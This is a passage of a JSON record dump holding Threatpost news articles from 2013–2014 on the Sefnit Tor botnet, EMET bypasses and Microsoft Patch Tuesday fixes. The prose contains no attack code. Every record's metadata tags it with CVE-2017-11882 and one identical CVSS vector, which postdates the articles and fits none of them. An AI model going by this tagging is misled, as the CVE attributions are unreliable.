"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:15", "description": "Alarm bells went off last August when spikes in Tor client downloads were traced to a large click-fraud and Bitcoin-mining botnet called Sefnit.\n\nThe [malware was using the popular anonymity network to communicate with hackers](<http://threatpost.com/huge-botnet-found-using-tor-network-for-communications/102179>) in order to transmit stolen data and receive additional commands. In Sefnit\u2019s case, the 600 percent increase in Tor usage it kicked off was also its [downfall](<http://threatpost.com/moving-to-tor-a-bad-move-for-massive-botnet/102284>) as Tor administrators noticed performance issues and steps were taken to strangle its activity.\n\nHackers\u2019 use of Tor and other Darknet services is really nothing new, but incidents such as the Sefnit takedown that ensued as well as the disruption of the Silk Road drug and malware underground market that also operated over Tor shed more light on the practice.\n\nFor example, researchers have Kaspersky Lab have published research uncovering three different campaigns that use Tor as a host infrastructure for criminal malware activities: a [64-bit version of the Zeus Trojan](<http://www.securelist.com/en/blog/208214171/The_inevitable_move_64_bit_ZeuS_has_come_enhanced_with_Tor>) that sends traffic through Tor and creates Tor hidden services to obscure the hackers\u2019 location; [Chewbacca](<http://threatpost.com/chewbacca-latest-malware-to-take-a-liking-to-tor/103220>), a Trojan that steals data from memory a la ram scapers, and communicates over Tor; and most recently an Android Trojan that uses a .onion domain as a command and control infrastructure.\n\nResearcher Sergey Lozhkin, a senior researcher with Kaspersky Lab, said his work investigating [criminals\u2019 use of darknets](<http://www.securelist.com/en/blog/8187/Tor_hidden_services_a_safe_haven_for_cybercriminals>) turned up 900 Tor hidden services and 5,500 nodes.\n\n\u201cThe possibility of creating an anonymous and abuse-free underground forum, market or malware C&amp;C server is attracting more and more criminals to the Tor network,\u201d Lozhkin said. \u201cHosting C&amp;C servers in Tor makes them harder to identify, blacklist or eliminate.\u201d\n\nLozhkin said Tor underground markets aren\u2019t set up much differently than legitimate ecommerce sites; most include some sort of registration process, offer buyers ratings on traders, and familiar interfaces through which purchases are made. Criminals are selling everything from money laundering services, credit cards, skimmers, carding equipment and more. And most of it is sold using Bitcoin.\n\nYesterday, Microsoft published new details on [Sefnit\u2019s Tor components](<http://blogs.technet.com/b/mmpc/archive/2014/03/05/sefnit-s-tor-botnet-c-amp-c-details.aspx>) and configuration data, the domains it was in contact with and how it communicates over Tor.\n\nAfter the August spike in Tor traffic alerted experts, Microsoft took steps to stop the botnet that were finally realized last Oct. 27 when it modified signatures sent through its update services that removed the outdated Tor client service installed by the malware. The Tor client service had a specific configuration that Microsoft identified, and despite some concerns that Microsoft was overstepping by possibly snaring some versions of Tor legitimately installed by users, the cleanup moved forward and Sefnit numbers dwindled.\n\nThe version installed with Sefnit was v0.2.3.25 and it did not automatically update, Microsoft said, leaving users exposed to a number of exploitable vulnerabilities. The Tor client was added as a Windows service on every computer infected by Sefnit and was configured to accept connections over ports 9050 and 9051; 9051 was used by Sefnit to obtain status information regarding its connection to Tor, while 9050 was used as a communication point for the malware\u2019s SOCKS proxy. Any application configured to use a proxy server, Microsoft said, to communicate over Tor. Sefnit, Microsoft said, used this port to contact its command servers and bypass intrusion detection systems, and utilized Tor hidden services to obfuscate server locations.\n\nThe malware comes with a list of .onion domains that are drop points for stolen data. Microsoft said the list of C&amp;C servers was found in file inside a random directory that is cryptographically generated. Within that directory is a file with a .ct extension that contains the victim\u2019s IP address, a string that is likely a victim ID, a list of command and control domains, and a working directory of the malware, Microsoft said.\n\nMicrosoft said that at its peak in August 2013 there were an estimated four million Sefnit clients which began receiving commands; that number had dipped significantly by the end of December, leaving [two million that could still be at risk](<http://blogs.technet.com/b/mmpc/archive/2014/01/09/tackling-the-sefnit-botnet-tor-hazard.aspx>) for attack because of Sefnit-added Tor services that are outdated, Microsoft said.\n", "cvss3": {}, "published": "2014-03-06T13:49:15", "type": "threatpost", "title": "Microsoft, Kaspersky Shed Light on Sefnit Tor Botnet", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-10T15:51:07", "id": "THREATPOST:027F94626186E3644FA6008B6B65879D", "href": "https://threatpost.com/shedding-new-light-on-tor-based-malware/104651/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:16", "description": "Exploits bypassing Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, are quickly becoming a parlor game for security researchers. With increasing frequency, white hats are poking holes in EMET, and to its credit, Microsoft has been quick to not only address those issues but challenge and reward researchers who successfully submit bypasses to its [bounty program](<http://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328>).\n\nThe tide may be turning, however, if the latest Internet Explorer zero day is any indication. An exploit used as part of the [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) against U.S. military targets contained a feature that checked whether an EMET library was running on the compromised host, and if so, the attack would not execute.\n\nThat\u2019s not the same as an in-the-wild exploit for EMET, but that may not be too far down the road, especially when you take into consideration two important factors: Microsoft continues to market EMET as an effective and temporary zero-day mitigation until a patch is released; and the impending end-of-life of Windows XP on April 8 could spark a surge in EMET installations as a stopgap.\n\nIn the meantime, the [EMET bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) keep on coming. The latest targeted a couple of mitigations in the [EMET 5.0 Technical Preview](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) released last week during RSA Conference 2014. Researchers at Exodus Intelligence refused to share much in the way of details on the exploit, preferring to offer it to its customers before making it available for public consumption. A tweet from cofounder and vice president of operations Peter Vreugdenhil said: \u201cEMET 5 bypassed with 20 ROP gadgets. ntdll only, esp points to heap containing fake stack, no other regs required. Adding to our feed soon.\u201d\n\nVreugdenhil is a fan of EMET, and is in the camp that believes hackers will be adding EMET bypasses to exploits within a year or two, despite the EMET module in Operation SnowMan, which he believes was added in order to keep the campaign from being detected as long as possible.\n\n\u201cI think most of the reason is that the return on investment for the bad guys is really not that high at this point,\u201d Vreugdenhil said. \u201cThat also means that by the time everybody actually uses [EMET] and the more ground it gains, the more likely it becomes that return on investment for the bad guys will be high enough for them to add it to their exploits.\u201d\n\nEMET provides users with a dozen [mitigations against memory-based exploits](<http://technet.microsoft.com/en-us/security/jj653751>), including ASLR, DEP, Export Address Table Filtering, Heapspray Allocation, and five return-oriented programming mitigations. ROP chains are the most effective bypass technique is use today, one that Vreugdenhil has used on a couple of occasions against EMET.\n\nWriting exploits targeting EMET, he said, is a little more involved than targeting a vulnerability in third-party software such as Flash or Java. Vreugdenhil said he generally starts with a publicly available exploit such as the latest IE 10 zero day and observes the crash the bug causes in order to understand how it corrupts memory and hopefully discloses memory that can be used to build an ROP chain. Microsoft\u2019s addition of Data Execution Prevention and ASLR in Windows Vista and Windows 7 prevents attackers from executing code in a particular memory location because those memory modules are now randomized.\n\n\u201cBack in Windows XP when there was no ASLR and no randomization of the modules, it was relatively easy. You would just pick a module and then reuse the code inside that module to still get code execution,\u201d Vreugdenhil said. \u201cWindows 7 came out and put the bar higher by shuffling the modules around, so theoretically, you didn\u2019t know where your modules were in the process. It theoretically should be impossible to point at an address and say \u2018Hey would you execute code at that address because I know there\u2019s something going to be there.\u2019\u201d\n\nIf an attacker can force a process to leak memory from inside back to an exploit, the attacker will be able to reuse that information and bypass ASLR and DEP because he will know where the memory module is located, Vreugdenhil said. From there, an attacker needs to figure out additional memory protections in place, and address those to control the underlying system.\n\n\u201cIn the case of EMET, there\u2019s a long list of protection mechanisms it adds, there\u2019s only two or three that could be a hindrance if you\u2019re writing a client-side IE exploit. And so it\u2019s usually just a matter of figuring out what they are and coming up with ways to sidestep them,\u201d Vreugdenhil said. \u201cIf we can do it, we assume there\u2019s many more people who can do it, and it\u2019s also going to be used by the bad guys anywhere between now and a year or two years.\u201d\n", "cvss3": {}, "published": "2014-03-05T10:07:31", "type": "threatpost", "title": "Researchers Investing in EMET Bypasses More than Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-05T20:45:44", "id": "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "href": "https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2013 Enterprises beat up by wave after wave of Java exploits and calls to disable the platform may soon have some relief in sight.\n\nMicrosoft\u2019s free Enhanced Mitigation Experience Toolkit will soon have a new feature that allows users to configure where plug-ins, especially those targeted by hackers such as Java and Adobe Flash, are allowed to run by default. The feature is called Attack Surface Reduction, and it\u2019s one of two that Microsoft has made available in a [technical preview of EMET 5.0](<http://blogs.technet.com/b/srd/archive/2014/02/21/announcing-emet-5-0-technical-preview.aspx>) released today at RSA Conference 2014.\n\n\u201cASR is going to help a lot of people,\u201d said Microsoft software security engineer Jonathan Ness.\n\nBlocking Java outright, despite some of the dire attacks reported during the past 15 months, isn\u2019t an option for most companies that have built custom Java applications for critical processes such as payroll or human resources. With 5.0, users will have the option to run plug-ins in the Intranet zone while blocking them in the browser\u2019s Internet zone, or vice-versa.\n\n\u201cIt gives customers more control over how plug-ins are loaded into applications,\u201d said Ness, explaining users will have the flexibility, for example, to allow Flash to load in a browser, but block it in an Office application such as Word or Excel. A number of advanced attacks have contained malicious embedded Flash files inside benign Word documents or Excel spreadsheets. Microsoft hopes to use feedback received on the Technical Preview to shape the final 5.0 product.\n\n\u201cFeedback is really valuable, and has helped shape this tool,\u201d Ness said, adding that the release of EMET 4.1 was delayed right before launch to correct a shortcoming pointed out by a beta user. The customer was not pleased with EMET\u2019s automatic termination of applications upon detecting an exploit, rather than having a configuration option available where the event could be logged an analyzed later.\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe second new feature in the EMET 5.0 Technical Preview is a number of enhanced capabilities to Export Address Table Filtering, or EAF+. Ness said EAF+ blocks how shellcode calls are made into EA table filtering.\n\n\u201cWith OS functions such as open file or create process, exported code wants to jump into EAF. This filters the shellcode and blocks it if it\u2019s an exploit,\u201d Ness said. \u201cWe\u2019re extending that with new filtering (KERNELBASE exports and additional integrity checks on stack registers and limits).\u201d\n\nEMET raises development costs for exploit writers with its memory protections, so much so that the recent Operation SnowMan APT attack included a module that detected whether an EMET library was present and if so, the exploit would not execute itself. Researchers have developed bypasses of EMET\u2019s mitigations, first Aaron Portnoy of Exodus Intelligence last summer, and most recently, researchers at Bromium Labs who developed a complete EMET bypass.\n\nMicrosoft\u2019s Ness said improvements to EMET\u2019s Deep Hooks API protections have been rolled into the 5.0 Technical Preview that address the Bromium bypass. Whether it remains on by default in the final 5.0 remains to be seen as application compatibility issues have to be resolved first, Ness said.\n", "cvss3": {}, "published": "2014-02-25T16:37:11", "type": "threatpost", "title": "Microsoft EMET 5.0 Technical Preview Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-25T21:37:11", "id": "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "href": "https://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:23", "description": "The expected continued respite from deploying Internet Explorer patches was apparently a mirage as Microsoft changed course from last Thursday\u2019s advance notification and added two more bulletins to the [February 2014 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-feb>), including the first IE rollup of 2014.\n\nIE had patched monthly for close to a year until the January security bulletins were released, and eyebrows were raised again last Thursday when there was no mention of an IE update.\n\nToday, however, Microsoft reversed course with [MS14-010](<https://technet.microsoft.com/en-us/security/bulletin/ms14-010>), which patches 24 vulnerabilities in the browser, including one that has been publicly disclosed. No active exploits have been reported, Microsoft said.\n\nAll of the vulnerabilities enable remote code execution, and affect versions of IE going back to IE 6 on Windows XP up to IE 11 on Windows 8.1. More than 20 CVEs involving memory corruption vulnerabilities in IE were addressed along with a cross-domain information disclosure vulnerability, an elevation of privilege vulnerability and a memory corruption issue related to VBScript that is addressed in [MS14-011](<https://technet.microsoft.com/en-us/security/bulletin/ms14-011>).\n\nA IE user would have to be lured to a website hosting an exploit for the vulnerability in the VBScript scripting engine in Windows. The engine improperly handles objects in memory, Microsoft said, and an exploit could corrupt memory and allow an attacker to run code on a compromised machine.\n\n\u201cTo go from five to seven bulletins says to me that initial testing was completed last minute so they decided to slip the patch in or testing found an issue and engineer shipped a fix last minute,\u201d said Tyler Reguly, manager of security research at Tripwire. \u201cEither way, pay extra attention to MS14-010 and MS14-011 in your test environments this month before you push them out enterprise wide.\u201d\n\nColleague Craig Young cautions that a number of the IE vulnerabilities can be combined to gain admin access on compromised machines.\n\n\u201cWithout any doubt, attacks in the wild will continue and expand to the other vulnerabilities being fixed today,\u201d Young said.\n\nAs promised, Microsoft did patch a remote code execution vulnerability, [MS14-008](<https://technet.microsoft.com/en-us/security/bulletin/ms14-008>), in its Forefront Protection for Exchange 2010 security product. Microsoft said it removed the offending code from the software.\n\n\u201cI\u2019m sure a lot of people will call attention to the Forefront Protection for Exchange patch this month. However when Microsoft, the people with the source code, tells us they can\u2019t trigger the vulnerability in a meaningful way, I intend to believe them,\u201d said Tripwire\u2019s Reguly. \u201cI suspect we\u2019ll wake up tomorrow and beyond pressing apply, we\u2019ll forget this was even released.\u201d\n\nMicrosoft stopped updating Forefront for Exchange as of September 2012, but will support it with security updates for another 22 months\n\n\u201cThis should make administrators think about upgrading their Exchange servers to the latest version (which includes basic anti-malware protection by default) or consider a third party email security application,\u201d said Russ Ernst of Lumension. \u201cAdministrators that currently use Forefront Protection for Exchange have until December 2015 to get this done.\u201d\n\nThe final critical bulletin, [MS14-007](<https://technet.microsoft.com/en-us/security/bulletin/ms14-007>), is another remote code execution bug in Direct2D, which can only be triggered viewing malicious content in IE. Direct2D is a graphics API used for rendering 2-D geometry, bitmaps and text, Microsoft said. This vulnerability affects Windows 7 through Windows 8.1.\n\nMicrosoft also released three bulletins rated important that patch privilege elevation, information disclosure and denial of service vulnerabilities.\n\n * [MS14-009](<https://technet.microsoft.com/en-us/security/bulletin/ms14-009>) patches two publicly disclosed bugs in the .NET framework that could allow an attacker to elevate their privileges on a compromised machine.\n * [MS14-005](<https://technet.microsoft.com/en-us/security/bulletin/ms14-005>) handles a vulnerability in Microsoft XML Core Services that could lead to information disclosure if the victim visits a malicious site with IE.\n * [MS14-006](<https://technet.microsoft.com/en-us/security/bulletin/ms14-006>) addresses a denial-of-service vulnerability in Windows 8, RT, and Server 2012, that has been publicly disclosed. An attacker would have to send a large number of malicious IPv6 packets to a vulnerable system to exploit the bug, and the attacker must be on the same subnet as the victim.\n\nMicrosoft also sent out an update that officially [deprecates the use of the MD5 hash algorithm](<http://threatpost.com/light-microsoft-patch-load-precedes-md5-deprecation/104104>). Digital certificates with MD5 hashes issued under roots in the Microsoft root certificate program are from now on restricted.\n\n\u201cCertificates with MD5 hashes should no longer be considered safe,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing. \u201cWe\u2019ve given our customers six months to prepare their environments, and now this update is available through automatic updates.\u201d\n", "cvss3": {}, "published": "2014-02-11T14:19:34", "type": "threatpost", "title": "February 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-11T19:19:34", "id": "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "href": "https://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:33", "description": "Microsoft announced Thursday that it plans to release four bulletins next week as part of the year\u2019s first batch of [Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2014/01/09/advance-notification-service-for-the-january-2014-security-bulletin-release.aspx>), none of which are rated critical.\n\nDespite the relatively light load, the patches do address a [zero-day vulnerability in Windows XP and Windows Server 2003](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) made public in early November. Hackers were actively exploiting the [flaw in the ND Proxy driver that manages Microsoft\u2019s Telephony API](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) on XP via infected PDF attachments. Exploits work only in conjunction with an Adobe Reader vulnerability that has since been patched.\n\nIn addition to Microsoft patches, expect a fresh batch of Adobe patches as well as Oracle\u2019s quarterly Critical Patch Update, which is generally a massive patch rollout that now includes Java patches.\n\nThe Microsoft bulletins will address vulnerabilities in Windows, Office and Dynamics AX, all which Microsoft has deemed important, including the zero-day fixes.\n\n\u201cIt\u2019s only rated important for a variety of reasons, including the fact that Microsoft will end support for XP in April,\u201d said Russ Ernst, a director of product management at Lumension. \u201cIf you\u2019re still using XP, this will be an important patch to deploy. And, hopefully you are working on your migration plan.\u201d\n\nAccording to a post on Microsoft\u2019s Security Response Center blog by Dustin Childs, MS14-002, will address the zero day, and he acknowledged they were working on a patch for the issue \u2013 which stems from a vulnerability in the kernel and allows local privilege escalation and access to the kernel \u2013 back in December.\n\n\u201cWe have only seen this issue used in conjunction with a PDF exploit in targeted attacks, and not on its own,\u201d Childs said.\n\nMicrosoft has used the zero-day vulnerability as a prime opportunity to urge [Windows users to migrate off XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>). The company previously announced its plans to effectively end support for the operating system on April 8.\n\nThe first bulletin will address a remote code execution in Microsoft\u2019s Sharepoint Server and Microsoft Word, the third will fix an elevation of privilege in Windows 7 and Server 2008 R2 and the last bulletin will fix a denial of service (DoS) issue in Microsoft\u2019s enterprise resource planning software, Dynamics AX.\n\nPer usual Microsoft will push updates for the software in question next Tuesday and post patch analysis and deployment guidance on its Security Response Center blog.\n", "cvss3": {}, "published": "2014-01-09T13:02:31", "type": "threatpost", "title": "Microsoft to Patch Zero Day in January 2014 Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-01-14T19:04:09", "id": "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "href": "https://threatpost.com/microsoft-expected-to-patch-xp-zero-day-on-patch-tuesday/103591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:41", "description": "One zero-day down, one to go.\n\nAs expected, Microsoft did today patch a zero-day in its GDI+ graphics component ([MS13-096](<https://technet.microsoft.com/en-us/security/bulletin/ms13-096>)) reported more than a month ago after exploits were spotted in the wild. The fix was one of 11 security bulletins\u2014five critical\u2014released as part of the December 2013 Patch Tuesday security updates.\n\nAnother zero-day, one affecting only Windows XP users, still remains [unpatched despite active exploits](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) targeting the vulnerability, which is found in the NDProxy driver that manages the Microsoft Telephony API. The attacks depend on a second vulnerability to deliver the exploit against an XP machine. Microsoft recommends turning off NDProxy as a mitigation until a patch is available.\n\nWhile there were five critical bulletins released today, experts urge IT administrators to also prioritize an ASLR bypass vulnerability that was patched today and rated \u201cimportant\u201d by Microsoft.\n\n[MS13-106](<https://technet.microsoft.com/en-us/security/bulletin/ms13-106>) takes care of an Office vulnerability that is being exploited in the wild, Microsoft said. Attackers hosting a malicious exploit online can trigger the vulnerability in the hxds.dll that enables a bypass of ASLR or Address Space Layout Randomization, a security feature in Windows that mitigates memory corruption exploits.\n\n\u201cThe vulnerability could allow security feature bypass if a user views a specially crafted webpage in a web browser capable of instantiating COM components, such as Internet Explorer,\u201d Microsoft said in its advisory. \u201cThe security feature bypass by itself does not allow arbitrary code execution. However, an attacker could use this ASLR bypass vulnerability in conjunction with another vulnerability, such as a remote code execution vulnerability that could take advantage of the ASLR bypass to run arbitrary code.\u201d\n\nASLR bypasses have been more frequent this year, and have been rolled into a number of exploit kits. Introduced in Windows Vista, ASLR hampers the reliability of exploits by negating an attacker\u2019s ability to predict where machine instructions will exist in memory. ASLR is particularly effective against buffer overflow attacks.\n\n\u201cThis particular library, hxds.dll, has been used by numerous attacks in the wild with great success because it can be easily loaded into memory from a web page by using the \u2018ms-help:\u2019 protocol handler,\u201d said Craig Young, security researcher at Tripwire. \u201cUntil today, the only options that protect against this were the removal of Office 2007/2010 installs or enabling Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET).\u201d\n\nAdmins will also have to contend with yet another cumulative update for Internet Explorer. [MS13-097](<https://technet.microsoft.com/en-us/security/bulletin/ms13-097>) patches a number of remote code execution vulnerabilities in the browser, all the way back to IE 6. IE has been patched almost monthly this year and has been front and center in numerous targeted attacks.\n\nMicrosoft also patched a critical bug in its Authenticode signing algorithm that is being exploited. [MS13-098](<https://technet.microsoft.com/en-us/security/bulletin/ms13-098>) allows remote code execution if a user is enticed to run an application that contains a malicious and signed portable execution file. The patch modifies how the WinVerifyTrust function handles Windows Authenticode signature verification for PE files, Microsoft said.\n\n\u201cAttackers have been abusing installers from legitimate software makers to install malware. These installers are configured in a way to dynamically download code extensions that are not checked for correct signatures, and attackers have found a way to piggyback on that mechanism,\u201d said Qualys CTO Wolfgang Kandek, who added that the patch prepares the system for a more stringent integrity check that prevents such exploits. Microsoft also issued a separate [security advisory](<http://technet.microsoft.com/en-us/security/advisory/2915720>) regarding the Authenticode patch, that after June 10, 2014 it will no longer recognize non-compliant signed binaries.\n\nThe two remaining critical bulletins, [MS13-099](<https://technet.microsoft.com/en-us/security/bulletin/ms13-099>) and [MS13-105](<https://technet.microsoft.com/en-us/security/bulletin/ms13-105>), patch remote code execution vulnerabilities in Microsoft Scripting Runtime Object Library and Exchange Server respectively. Three of the four Exchange vulnerabilities addressed in the bulletin, it\u2019s worth noting, are publicly disclosed. The most serious is in the WebReady Document Viewing and DLP features of Exchange Server, Microsoft said.\n\nThe remaining bulletins\u2014rated \u201cimportant\u201d\u2014address one remote code execution bug, three privilege escalation issues and an information disclosure vulnerability:\n\n * [MS13-100](<https://technet.microsoft.com/en-us/security/bulletin/ms13-100>) patches a remote code execution vulnerability in Microsoft SharePoint Server; an attacker would have to be authenticated to the server to exploit the vulnerability. A successful exploit would enable an attacker to run code in the context of the W3WP service account on the SharePoint site.\n * [MS13-101](<https://technet.microsoft.com/en-us/security/bulletin/ms13-101>) fixes a privilege elevation issue in Windows Kernel-Mode Drivers. An attacker would have to log onto a system and run a malicious application to exploit the bug.\n * [MS13-102](<https://technet.microsoft.com/en-us/security/bulletin/ms13-102>) is a patch for a vulnerability in the LRPC Client that would allow an attacker to elevate their privileges on an LRPC server. Doing so would allow an attacker to install programs, manipulate data or create accounts. Valid credentials are needed to exploit this bug.\n * [MS13-103](<https://technet.microsoft.com/en-us/security/bulletin/ms13-103>) patches a vulnerability in ASP.NET SignalIR that could elevate an attacker\u2019s privileges if they are able to reflect Javascript back to the user\u2019s browser. Microsoft also issued an [advisory](<http://technet.microsoft.com/en-us/security/advisory/2905247>) for a flaw in ASP.NET view state that exists when Machine Authentication Code (MAC) validation is disabled through configuration settings.\n * [MS13-104](<https://technet.microsoft.com/en-us/security/bulletin/ms13-104>) is a fix for an information disclosure vulnerability in Microsoft Office. Successful exploits could give an attacker access tokens used to authenticate a user on a SharePoint or Office server site.\n\nMicrosoft also sent out an [advisory](<http://technet.microsoft.com/en-us/security/advisory/2871690>) that revokes the digital signatures for nine private, third-party UEFI modules for Windows 8 and Windows Server 2012 machines. These modules would be loaded during a UEFI Secure Boot, if it is enabled.\n", "cvss3": {}, "published": "2013-12-10T16:09:59", "type": "threatpost", "title": "December 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-12T20:37:55", "id": "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "href": "https://threatpost.com/microsoft-patches-gdi-zero-day-experts-urge-close-look-at-important-aslr-bypass-patch/103157/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:43", "description": "Microsoft will, next week, patch a [zero-day vulnerability in its GDI+ graphics component](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) being exploited in targeted attacks in the Middle East and Asia.\n\nThe zero day has sat unpatched since it was made public Nov. 5; Microsoft did release a FixIt tool as a temporary mitigation. The patch is one of 11 bulletins Microsoft said today it will release as part of its [December 2013 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-dec>); five of the bulletins will be rated critical.\n\nMicrosoft did confirm, however, that a [zero day in the NDProxy driver](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) that manages the Microsoft Telephony API on Windows XP systems will not be patched. That zero day is also being exploited in the wild alongside a PDF exploit of a patched Adobe Reader flaw.\n\nThe GDI+ vulnerability is found in several versions of Windows and Office and enables an attacker to gain remote-code execution, but only on Windows Vista, Windows Server 2008, and Office 2003 through 2010. The vulnerability exists in the way the GDI+ component handles TIFF images. Microsoft said an attacker would have to entice a victim to preview or open a malicious TIFF attachment or visit a website hosting the exploit image.\n\nTuesday\u2019s critical patches address remote code execution vulnerabilities in a number of Microsoft products, including not only Windows and Office, but Lync, Internet Explorer and Exchange. Vulnerabilities in SharePoint, Lync, SingnalR and ASP.NET are among those rated important by Microsoft. Those vulnerabilities are primarily privilege escalation issues as well as an information disclosure bug.\n\nThis will be the last scheduled release of security updates from Microsoft for the year. It looks like Tuesday\u2019s updates will bring the 2013 count to 106 bulletins, up sharply from 83 last year, according to Qualys CTO Wolfgang Kandek. Microsoft had similar numbers of bulletins in 2011 (100) and 2010 (106).\n\n\u201cRegarding 0-days, Microsoft has consistently pointed out that the additional security toolkit EMET (Enhanced Mitigation Experience Toolkit) has been effective against all of the 0-day problems this year,\u201d Kandek said. \u201cWe believe it is a proactive security measure that organizations should evaluate and consider as an additional layer in their defensive measures.\u201d\n\nThe XP zero-day, meanwhile, will likely be left for the January 2014 Patch Tuesday updates. The vulnerability is a privilege escalation vulnerability and allows kernel access.\n\nFireEye researchers said they found the exploit in the wild being used [alongside a PDF-based exploit](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html>) against a patched Adobe Reader vulnerability. Reader versions 9.5.4, 10.1.6, 11.0.02 and earlier on XP SP3 are affected, later versions are not, FireEye said, adding that this exploit gives a local user the ability to execute code in the kernel, such as install new software, manipulate data, or create new accounts. The exploit cannot be used remotely, the company said.\n\nMicrosoft recommended deleting the NDProxy.sys driver as a workaround; the mitigation, however, will impact TAPI operations.\n\n\u201cSystem administrators everywhere must have made Microsoft\u2019s naughty list because this holiday \u2018gift\u2019 is clearly a lump of coal,\u201d said Tyler Reguly, technical manager of security research and development at Tripwire. \u201cMicrosoft is wrapping up the 2013 patch season with anything that was laying around. Someone should tell Microsoft they forgot to include the kitchen sink.\u201d\n", "cvss3": {}, "published": "2013-12-05T16:07:42", "type": "threatpost", "title": "TIFF Zero Day Patch Among December 2013 Microsoft updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-05T21:07:43", "id": "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "href": "https://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:49", "description": "Microsoft announced this afternoon that the zero-day vulnerability being exploited in a watering hole attack against an unnamed U.S.-based NGO website was already scheduled to be patched in a [cumulative Internet Explorer update](<http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx>) tomorrow.\n\nThe zero-day was reported publicly on Friday by FireEye researchers and today a few more dots were connected on the attack, which is dropping a variant of the McRAT Trojan that has been used in a number of [targeted espionage attacks](<http://threatpost.com/ie-zero-day-watering-hole-attack-injects-malicious-payload-into-memory/102891>) targeting industrial secrets.\n\nMicrosoft promised a relatively light [Patch Tuesday tomorrow](<http://threatpost.com/tiff-zero-day-missing-from-november-patch-tuesday-updates/102864>) that included another IE rollup, a staple of the company\u2019s monthly security updates in 2013. Dustin Childs, a group manager in the Microsoft Trustworthy Computing group, said today that the vulnerability in an IE ActiveX Control will be patched in MS13-90 tomorrow.\n\nIn its [advanced notification](<http://technet.microsoft.com/en-us/security/bulletin/ms13-nov>) released last Thursday, Microsoft said the IE bulletin is rated critical because it involves flaws that can lead to remote code execution. The critical rating applies to IE 6-8 on Windows XP, IE7-9 on Vista, IE 8-10 on Windows 7, and IE 10 on Windows 8 and 8.1; all other versions are rated important.\n\nFireEye, today told Threatpost, that the attack is limited to a single U.S.-based website hosting domestic and international policy guidance. No details were available on how the site was compromised, only that the victims were hit by malware in drive-by download attacks targeting an information leakage 